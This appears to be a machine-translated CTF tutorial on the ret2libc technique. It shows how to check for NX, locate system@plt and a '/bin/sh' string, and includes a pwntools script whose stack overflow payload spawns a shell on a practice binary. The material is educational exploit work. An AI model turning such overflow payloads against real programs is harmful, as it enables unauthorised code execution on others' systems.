ret2libc

principle

perform libc Medium /bin/sh

step

First , Check the security protection of the program

 Turn on NX：no executable 
（ Non executable memory data pages ）
（ Can not make use of ret2text And ret2shellcode）

secondly , Check if there is /bin/sh

Check if there is system （segment yes plt, No extern）

/bin/sh, Is a string , Need to know the address .

system, Is a callable function , Need to know the address .

use system call /bin/sh that will do

So write payload, Addressing mode can be viewed Previous blogs , A fellow 112.

#!/usr/bin/env python
from pwn import *

sh = process('./ret2libc1')

binsh_addr = 0x8048720
system_plt = 0x08048460
payload = flat(['a' * 112, system_plt, 'b' * 4, binsh_addr])
sh.sendline(payload)

sh.interactive()

call libc Format of function ：

system_plt + 4 Bytes （32 Bit address ） + /bin/sh character string

Here we need to pay attention to the structure of the function call stack , If it is a normal call system function , When we call, there will be a corresponding return address , Here we use ’bbbb’ As a false address , The parameter content corresponding to the subsequent parameters .

This example is relatively simple , It also provides system Address and /bin/sh The address of , But most programs don't have such a good situation .